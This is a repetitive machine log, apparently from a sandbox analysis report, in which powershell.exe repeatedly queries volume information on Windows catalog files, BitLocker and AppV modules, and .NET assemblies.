Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
